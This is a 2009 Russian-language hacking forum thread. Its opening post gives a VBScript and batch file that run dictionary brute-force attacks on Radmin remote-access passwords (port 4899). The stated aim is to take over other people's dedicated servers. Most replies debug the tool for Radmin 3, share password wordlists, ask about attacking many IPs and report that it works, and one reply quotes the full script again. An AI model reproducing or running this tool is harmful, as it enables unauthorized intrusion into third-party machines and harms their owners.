Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   брутфорс дедиков через Radmin (https://forum.antichat.xyz/showthread.php?t=120485)

winner13 13.05.2009 22:36
брутфорс дедиков через Radmin
 
[{Введение}

Салют всем любителям «холявных» дедиков, и просто нашедшим на атакуймой машине открытый 4899 порт из под радмина посвящается.

{Теория}

Все мы сталкивались с такой ситуацией ,когда насканив радминовский порт ,мы с безумным блеском в глазах вбивая дефолтный пасс , обламывались на говно. А взять себе данный дед, желание так просто и распирает. Что делать??? Все просто пишем свой Брут под данный косяк.
Для начала у нас должен быть алгоритм. Для написания Я выбрал язык программирования VBS script. Что же должен делать наш брутфорс.
Вот простенький алгоритм (Проще думаю уже некуда) :

1.Это принимать IP-адрес атакуемой машины.
2. Находить словарь, и по нему осуществлять подбор
3. Выводить результат.

Ну всё переходим к практике.


{Практика (геморрой)}( Все что приведено тут делается в простом блокноте.)

Что так просто кажется в теории, не так просто сделать на практике. Для начала сделаем сам брут. Так как програмулину на ВБС учить работать с сетью это мутатень, будем использовать программу уже умеющую делать это, а именно Radmin.exe.
Первое что мы сделаем , это создадим бат файл , где укажем какие параметры он должен передать брут скрипту. Исходник батника будет выглядеть так :

Start.bat
Код:
cscript winner13.vbs password.txt
(сохраняем это в файл start.bat)
Тут видим что через батник запускается winner13.vbs с параметром password.txt

Где же сам брутфорс спросите вы ,а вот он:
(из за простоты скрипта, комментарий думаю излишний)
Код:
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo "      ==================================================="
WScript.Echo "      =    Вводим ip атакуемого                        ="
WScript.Echo "      =                                                            ="
WScript.Echo "      =    Используется: cscript winner13.vbs          ="
WScript.Echo "      =    Подбор по словарю = password.txt    ="
WScript.Echo "      ==================================================="
WScript.Echo " "
WScript.Echo "          note: do not interfere with the process !!!!  "
WScript.Echo " "
WScript.Echo " "

Set objShell = CreateObject("Wscript.Shell") ' создаём вбс объект

intValue = InputBox("Please Enter Your Target IP:") ' делаем ввод данных по айпишнегу.
strCommandLine = intValue



Set cmd = CreateObject("WScript.Shell")
If WScript.Arguments(0) = "" Then
  WScript.Echo "usage: cscript vbsFile.vbs <yourtxtfile>" ' юзаем наш password.TXT
Else
  Set fso = CreateObject("Scripting.FileSystemObject")
  Filename = WScript.Arguments(0)

  If fso.FileExists(Filename) Then ' цикл подбора
      Set objTextFile = fso.OpenTextFile(Filename,1) ' открытие словаря
WScript.Sleep 2000
      Do Until objTextFile.AtEndOfStream
line = objTextFile.Readline

WScript.Echo "[+]      Атакуется " & intValue & "....... " & line ' вывод строки
WScript.Sleep 200
      set WshShell = WScript.CreateObject("WScript.Shell") ' начало работы с файлом radmin.exe
WshShell.Run "radmin.exe /connect:" & intValue & ":4899 /telnet" 'запуск
WScript.Sleep 1000 'задержка в секунду
WshShell.AppActivate "Enter password for <Entry name>" 'вывод положительного результат если таковой есть
WshShell.SendKeys line
WScript.Sleep 1000 'задержка в секунду
WshShell.SendKeys "{ENTER}"
WScript.Sleep 1000
WshShell.SendKeys "{ENTER}"

loop
      objTextFile.Close 'закрытие словаря
  Else
      WScript.Echo Filename & "не найденно" ' вывод отрицательного результата
  End If
End If
(всё это сохраняем как winner13.vbs)
Ну вот 2 файла у нас готово , это start.bat и winner13.vbs. Теперь нам лишь остается закинуть в папку саму программу radmin.exe, и словарь для атаки password.txt

Итак. Последовательность действий:
1.Выделяем какую нить пустую папочку
2. Создаем там батник start.bat
3.Создаем ВБСскрипт winner13.vbs
4. Кидаем туда же radmin.exe
5. Создаем словарь для атаки password.txt
А дальше всё просто =).Брутим дедик , и наслаждаемся результатом.


{Вывод}

Ну тут как обычно , автор не несёт ответственности за ваши действия , и т.д и т.п. Всё что вы сделаете в этом виноваты вы сами, эта статья лишь для ознакомления. Всем всего доброго. Поверид бай winner13
(с) winner13

P.S. для тех у кого нечего не работает, чуть позже выложу уже готовое. С наилучшими пожеланиями от меня.

nemaniak 14.05.2009 19:49
Хорош, автору респект. Ша буду тестить...

nemaniak 14.05.2009 21:33
Вообщем, вопрос следующего характера: А почему при бруте слова со словаря password.txt вставляются в поле username, а не в password?

P.S. Еще вопрос немного оффтопик: Какой логин:пасс у радмина по-умолчанию?

winner13 14.05.2009 21:44
Цитата:
Сообщение от nemaniak
Вообщем, вопрос следующего характера: А почему при бруте слова со словаря password.txt вставляются в поле username, а не в password?
скорей всего ты что то не так собрал, либо несовместимый радмин ,нет тех фитч,что на той версии которую использовал Я .Сейчас выложу готовое.

winner13 14.05.2009 22:38
Всё для вас пожалуйста пользуйтесь +)



рабочий линк

navigat0r 14.05.2009 23:13
проверим
кто тестил, отпишитесь

nemaniak 14.05.2009 23:40
Скачал твою рабочую версию, сейчас пишет
Incorrect version of server
Какова версия твоего radmin'a? Судя по всему вторая, значит дедики с версией 3 радмин сервера брутить не получится?

navigat0r 14.05.2009 23:44
киньте у кого есть норм словарь

winner13 15.05.2009 01:39
Цитата:
Сообщение от nemaniak
Скачал твою рабочую версию, сейчас пишет
Incorrect version of server
Какова версия твоего radmin'a? Судя по всему вторая, значит дедики с версией 3 радмин сервера брутить не получится?
Просто кинь ехе-шник радмина ,3 версии в папку и всё будет гуд.просто Когда писал это, ещё 2радмин новой версией был.Всё норм работает =)






А словари через гугл , там линков много.Сюда кину что нормальное найду.

navigat0r 15.05.2009 20:33
вот словарь для брута(пособирал на ачате)

nemaniak 15.05.2009 23:13
Цитата:
Сообщение от winner13
Просто кинь ехе-шник радмина ,3 версии в папку и всё будет гуд.просто Когда писал это, ещё 2радмин новой версией был.Всё норм работает =)
С третьим у меня не заработало, о чем я писал вначале(

winner13 15.05.2009 23:33
Вот набор линков , где можно скачать словари для брутфорса. С http://www.cyberinfo.ru/3/1596_1.htm :

Код:
www.passwords.ru/dic.htm
ftp.openwall.com/pub/wordlists/
ftp.cerias.purdue.edu/pub/dict/
ftp.ox.ac.uk/pub/wordlists/
ftp.funet.fi/pub/unix/security/dictionaries/
www.outpost9.com/files/WordLists.html
www.phreak.com/html/wordlists.shtml
coast.cs.purdue.edu/pub/dict/wordlists/

winner13 15.05.2009 23:35
Вот ещё линк

winner13 21.05.2009 21:34
Цитата:
Сообщение от nemaniak
С третьим у меня не заработало, о чем я писал вначале(
Честно , хз чё там у тебя, тестировал последнюю версию радмина , все прошло на ура и даже ни пикнуло.Думаю ты что то наверно не так юзаешь, так как все фитчи радмина из вызовов программы из командной строки стандартны во всех версиях.

nemaniak 21.05.2009 23:22
Цитата:
Сообщение от winner13
Честно , хз чё там у тебя, тестировал последнюю версию радмина , все прошло на ура и даже ни пикнуло.Думаю ты что то наверно не так юзаешь, так как все фитчи радмина из вызовов программы из командной строки стандартны во всех версиях.
Разница Радмин сервера версии 2 и версии 3 в том, что 2-я просит только пароль, а 3-я просит и логин и пароль, так вот, оно то с третьей версией работает и не пикает, только вот вместо поля пароля оно вводит в поле логина. Сам скрипт писался для 2-й версии как я понял, а значит про логин там и не упоминалось. В клиенте то ничего в смысле вызова из командной строки не поменялось, но вот реакция клиента на разные версии радмина тоже разная, вообщем потести на 2-й версии сервера и на 3-й и сравни результат. Просто надо брать какое-либо значение по умолчанию и вбивать его в логин, а пароли из списка вбивать в поле паролей, для начала будет самый гуд.

!TNK! 17.09.2009 23:22
Цитата:
Сообщение от winner13
[{Введение}

Салют всем любителям «холявных» дедиков, и просто нашедшим на атакуймой машине открытый 4899 порт из под радмина посвящается.

{Теория}

Все мы сталкивались с такой ситуацией ,когда насканив радминовский порт ,мы с безумным блеском в глазах вбивая дефолтный пасс , обламывались на говно. А взять себе данный дед, желание так просто и распирает. Что делать??? Все просто пишем свой Брут под данный косяк.
Для начала у нас должен быть алгоритм. Для написания Я выбрал язык программирования VBS script. Что же должен делать наш брутфорс.
Вот простенький алгоритм (Проще думаю уже некуда) :

1.Это принимать IP-адрес атакуемой машины.
2. Находить словарь, и по нему осуществлять подбор
3. Выводить результат.

Ну всё переходим к практике.


{Практика (геморрой)}( Все что приведено тут делается в простом блокноте.)

Что так просто кажется в теории, не так просто сделать на практике. Для начала сделаем сам брут. Так как програмулину на ВБС учить работать с сетью это мутатень, будем использовать программу уже умеющую делать это, а именно Radmin.exe.
Первое что мы сделаем , это создадим бат файл , где укажем какие параметры он должен передать брут скрипту. Исходник батника будет выглядеть так :

Start.bat
Код:
cscript winner13.vbs password.txt
(сохраняем это в файл start.bat)
Тут видим что через батник запускается winner13.vbs с параметром password.txt

Где же сам брутфорс спросите вы ,а вот он:
(из за простоты скрипта, комментарий думаю излишний)
Код:
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo " "
WScript.Echo "      ==================================================="
WScript.Echo "      =    Вводим ip атакуемого                        ="
WScript.Echo "      =                                                            ="
WScript.Echo "      =    Используется: cscript winner13.vbs          ="
WScript.Echo "      =    Подбор по словарю = password.txt    ="
WScript.Echo "      ==================================================="
WScript.Echo " "
WScript.Echo "          note: do not interfere with the process !!!!  "
WScript.Echo " "
WScript.Echo " "

Set objShell = CreateObject("Wscript.Shell") ' создаём вбс объект

intValue = InputBox("Please Enter Your Target IP:") ' делаем ввод данных по айпишнегу.
strCommandLine = intValue



Set cmd = CreateObject("WScript.Shell")
If WScript.Arguments(0) = "" Then
  WScript.Echo "usage: cscript vbsFile.vbs <yourtxtfile>" ' юзаем наш password.TXT
Else
  Set fso = CreateObject("Scripting.FileSystemObject")
  Filename = WScript.Arguments(0)

  If fso.FileExists(Filename) Then ' цикл подбора
      Set objTextFile = fso.OpenTextFile(Filename,1) ' открытие словаря
WScript.Sleep 2000
      Do Until objTextFile.AtEndOfStream
line = objTextFile.Readline

WScript.Echo "[+]      Атакуется " & intValue & "....... " & line ' вывод строки
WScript.Sleep 200
      set WshShell = WScript.CreateObject("WScript.Shell") ' начало работы с файлом radmin.exe
WshShell.Run "radmin.exe /connect:" & intValue & ":4899 /telnet" 'запуск
WScript.Sleep 1000 'задержка в секунду
WshShell.AppActivate "Enter password for <Entry name>" 'вывод положительного результат если таковой есть
WshShell.SendKeys line
WScript.Sleep 1000 'задержка в секунду
WshShell.SendKeys "{ENTER}"
WScript.Sleep 1000
WshShell.SendKeys "{ENTER}"

loop
      objTextFile.Close 'закрытие словаря
  Else
      WScript.Echo Filename & "не найденно" ' вывод отрицательного результата
  End If
End If
(всё это сохраняем как winner13.vbs)
Ну вот 2 файла у нас готово , это start.bat и winner13.vbs. Теперь нам лишь остается закинуть в папку саму программу radmin.exe, и словарь для атаки password.txt

Итак. Последовательность действий:
1.Выделяем какую нить пустую папочку
2. Создаем там батник start.bat
3.Создаем ВБСскрипт winner13.vbs
4. Кидаем туда же radmin.exe
5. Создаем словарь для атаки password.txt
А дальше всё просто =).Брутим дедик , и наслаждаемся результатом.


{Вывод}

Ну тут как обычно , автор не несёт ответственности за ваши действия , и т.д и т.п. Всё что вы сделаете в этом виноваты вы сами, эта статья лишь для ознакомления. Всем всего доброго. Поверид бай winner13
(с) winner13

P.S. для тех у кого нечего не работает, чуть позже выложу уже готовое. С наилучшими пожеланиями от меня.


на сегодня для меня актуальная тема :D


все это ништяк
но гуды он никуды не сохраняет
просто открывает телнет
и гадай на какой пасс он сбрутил
в чем беда?

Soloma 20.09.2009 11:44
Работает, спс.

Keltos 20.09.2009 12:02
Все теперь у меня тоже работает

demontager 18.10.2009 16:49
А такой вопрос, можно брутить список IP с открытым 4889 портом? Или только один IP можно брутить?


Время: 07:02